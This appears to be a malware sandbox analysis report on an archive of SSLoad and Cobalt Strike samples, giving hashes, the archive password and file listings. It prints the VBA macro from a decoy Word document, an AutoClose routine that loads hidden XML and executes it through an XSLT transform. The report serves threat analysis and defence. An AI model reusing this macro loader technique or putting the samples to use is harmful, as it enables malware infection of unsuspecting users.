Resubmissions

17-10-2024 13:08

241017-qc85dsydmg 10

17-10-2024 13:06

241017-qcdngssbnr 8

General

  • Target

    2024-04-18-SSLoad-and-Cobalt-Strike-malware-and-artifacts.zip

  • Size

    5.3MB

  • MD5

    30b590347982e79f8af515d7f2e49ad7

  • SHA1

    bca3f7a21b3444678b7c37831a311f0e1e172bb3

  • SHA256

    4223688925e083fbc1fb17daf06664bd64a7ddc3db30cdc67cafbe6133567cbb

  • SHA512

    9ccfa852d7685c115669a3270c959b9474d3256c98d4074a20f0d9209226e638e3ae12ba6375c24b64f2e1734b8661593c761ee4f76cf077b3ca00eaf143b71a

  • SSDEEP

    98304:Kbrqq6Ubf2zDlX3hEXsfsKfYjx7sLinqMlaMAi6Ptbgk2MFuh3XJTUit1JhZq5VQ:KD+DlXxISxEx70oqLi6PJPFuNX2iDXwM

Score
8/10

Malware Config

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Unsigned PE 2 IoCs

    Checks for missing Authenticode signature.

Files

  • 2024-04-18-SSLoad-and-Cobalt-Strike-malware-and-artifacts.zip
    .zip

    Password: infected_20240418

  • 2024-04-18-CobaltStrike-DLL.bin
    .dll regsvr32 windows:6 windows x64 arch:x64

    Password: infected_20240418

    fde5069783a744f97063c1afd7b8a158


    Headers

    Imports

    Exports

    Sections

  • 2024-04-18-IOCs-from-SSLoad-infection-with-Cobalt-Strike-DLL.txt
  • 2024-04-18-SSLoad-DLL.bin
    .dll regsvr32 windows:5 windows x86 arch:x86

    Password: infected_20240418

    c5b12c669953a1f4f98cd32040d998ff


    Headers

    Imports

    Exports

    Sections

  • 2024-04-18-scheduled-task-for-SSLoad.txt
  • Incident_Report_Harassment.doc
    .doc windows office2003

    ThisDocument

    1
    Attribute VB_Name = "ThisDocument"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9

    Module1

    1
    Attribute VB_Name = "Module1"
    2
    Sub AUtoclose()
    3
    Set Document = GetObject("new:MSXML2.DomDocument")
    4
    Document.LoadXML UserForm1.Label1.Caption
    5
    Document.transformnode Document
    6
    End Sub
    7
    8

    UserForm1

    1
    Attribute VB_Name = "UserForm1"
    2
    Attribute VB_Base = "0{C3D577F1-DFE3-4E30-89D6-180BE62FFA79}{15CAAC9A-68B3-428A-9970-484B483C9266}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = False
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = False
    9

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.